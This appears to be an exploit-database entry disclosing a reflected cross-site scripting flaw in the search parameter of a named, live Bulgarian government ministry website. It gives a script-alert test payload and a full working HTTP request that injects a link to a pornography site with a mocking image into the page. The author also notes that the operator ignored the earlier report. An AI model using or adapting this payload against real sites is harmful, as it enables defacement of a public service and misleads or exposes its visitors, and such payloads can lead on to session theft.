Share
## https://sploitus.com/exploit?id=PACKETSTORM:211368
## Titles: moew.government.bg Cross-site scripting (reflected)
    ## Author: nu11secur1ty
    ## Date: 11/10/2025
    ## Vendor: https://www.moew.government.bg/
    ## Software: https://www.moew.government.bg/
    ## Reference: https://portswigger.net/web-security/cross-site-scripting
    
    ## Description:
    -NOTE: The target is not RESPONDING after I reported this problem, one year
    early. WHAT A SHAME!
    The value of the query request parameter is copied into the value of an
    HTML tag attribute which is encapsulated in double quotation marks. The
    payload mxrdv"><script>alert(1)</script>zt9br was submitted in the query
    parameter. This input was echoed unmodified in the application's response.
    
    STATUS: HIGH- Vulnerability
    
    [+]Exploit:
    
    ```
    GET /bg/search/?query=%3Ca%20href=%22https://www.pornhub.com
    %22%20target=%22_blank%22%3E%20%3Cimg%20src=%22
    https://media1.tenor.com/m/sLjUbG5BVikAAAAd/trump-dance-trump-2024.gif%22%20alt=%22STUPID%22width=%22900%22%20height=%22450%22%3E%20%3C/a%3E&submit=%D0%A2%D1%8A%D1%80%D1%81%D0%B8
    HTTP/1.1
    Host: www.moew.government.bg
    Cookie: _ga_7HXZLF4R2C=GS2.1.s1756997385$o1$g1$t1756997784$j59$l0$h0;
    _ga=GA1.2.946718660.1756997386
    Sec-Ch-Ua: "Not_A Brand";v="99", "Chromium";v="142"
    Sec-Ch-Ua-Mobile: ?0
    Sec-Ch-Ua-Platform: "Windows"
    Accept-Language: en-US,en;q=0.9
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
    (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
    Accept:
    text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate, br
    Priority: u=0, i
    Connection: keep-alive
    ```
    
    
    ## Demo PoC:
    [href](
    https://www.nu11secur1ty.com/2025/11/moewgovernmentbg-xss-reflected.html)
    
    ## Time spent:
    00:27:00
    
    
    -- 
    System Administrator - Infrastructure Engineer
    Penetration Testing Engineer
    Exploit developer at https://packetstormsecurity.com/
    https://cve.mitre.org/index.html
    https://cxsecurity.com/ and https://www.exploit-db.com/
    home page: https://www.asc3t1c-nu11secur1ty.com/
    hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
    nu11secur1ty <https://nu11secur1ty.blogspot.com/>